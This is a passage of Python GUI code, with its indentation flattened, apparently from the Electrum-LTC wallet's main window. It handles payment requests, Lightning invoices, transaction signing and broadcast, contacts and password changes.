def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Litecoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Litecoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Litecoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice, amount_sat=None):
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, key):
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, key, description=None):
self.show_message(_('Payment succeeded'))
self.need_update.set()
def on_payment_failed(self, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
invoice_dict = self.wallet.lnworker.parse_bech32_invoice(invoice)
if invoice_dict.get('amount') is None:
amount = self.amount_e.get_amount()
if amount:
invoice_dict['amount'] = amount
else:
self.show_error(_('No amount'))
return
return invoice_dict
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice['outputs']
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'], amount_sat=invoice['amount'])
elif invoice['type'] == PR_TYPE_ONCHAIN:
outputs = invoice['outputs']
self.pay_onchain_dialog(self.get_coins(), outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
self.show_message(_('Not Enough Funds'))
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum_ltc.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error('Cannot find payment request in wallet.')
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr: 'paymentrequest.PaymentRequest'):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x.value)+ self.base_unit() + ' @ ' + x.address, pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
# note: "delete" disabled as invoice is saved with a different key in wallet.invoices that we do not have here
# def do_delete():
# if self.question(_('Delete invoice?')):
# self.wallet.delete_invoice(key)
# self.history_list.update()
# self.invoice_list.update()
# d.close()
# deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, CloseButton(d)))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if not self.network.is_lightning_running():
return
cur, total = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_percent = 0
progress_str = "??%"
if cur is not None and total is not None and total > 0:
# note: Progress is rescaled such that 95% is considered "done".
# "Real" progress can stay around 98-99% for a long time, which
# might needlessly worry users.
progress_percent = (1.0 / 0.95 * cur / total) * 100
progress_percent = min(progress_percent, 100)
progress_percent = round(progress_percent)
progress_str = f"{progress_percent}%"
if progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum_ltc.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.can_have_lightning():
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
